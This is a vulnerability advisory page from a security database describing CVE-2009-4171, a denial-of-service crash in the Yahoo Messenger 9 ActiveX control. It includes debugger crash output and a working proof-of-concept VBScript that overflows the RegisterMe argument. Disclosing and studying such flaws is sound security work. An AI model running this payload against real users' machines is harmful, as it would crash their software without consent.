Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability
2009.11.16
Credit:
HACKATTACK IT SECURITY GmbH
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2009-4171
CWE:
CWE-119
Ogólna skala CVSS:
4.3/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Brak
Wpływ na dostępność:
Częściowy
Product: Yahoo Messenger 9.0.0.2162 ************************************************************************ ******** Vulnerability: ActiveX Null Pointer - Denial of Service ************************************************************************ ******** Description: Yahoo Messenger is prone to a denial-of-service (cause of null pointer) vulnerability. Vulnerability is in YahooBridgeLib.dll (Activex Control) An attacker can exploit this vulnerability by enticing an unsuspecting victim to view a malicious webpage. ************************************************************************ ******** Credits: HACKATTACK IT SECURITY GmbH Penetration Testing in Deutschland - sterreich - Schweiz www.hackattack.com ************************************************************************ ******** Debugger Results: (1910.1a18): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=100092b4 ecx=018f0898 edx=002ae8d4 esi=00000000 edi=00000000 eip=10001074 esp=002ae858 ebp=002ae8dc iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** WARNING: Unable to verify checksum for C:\Program Files\Yahoo!\Messenger\YahooBridgeLib.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Yahoo!\Messenger\YahooBridgeLib.dll - YahooBridgeLib+0x1074: 10001074 8b08 mov ecx,dword ptr [eax] ds:0023:00000000=???????? 0:000> !analyze -v ... ... ... PRIMARY_PROBLEM_CLASS: NULL_POINTER_READ DEFAULT_BUCKET_ID: NULL_POINTER_READ ************************************************************************ ******** PoC (.wsf script) : <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' /> <script language='vbscript'> arg1=String(11284, "A") target.RegisterMe arg1 </script> </job> </package>
Referencje:
http://xforce.iss.net/xforce/xfdb/54263
http://www.securityfocus.com/bid/37007
http://www.securityfocus.com/archive/1/archive/1/507818/100/0/threaded
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top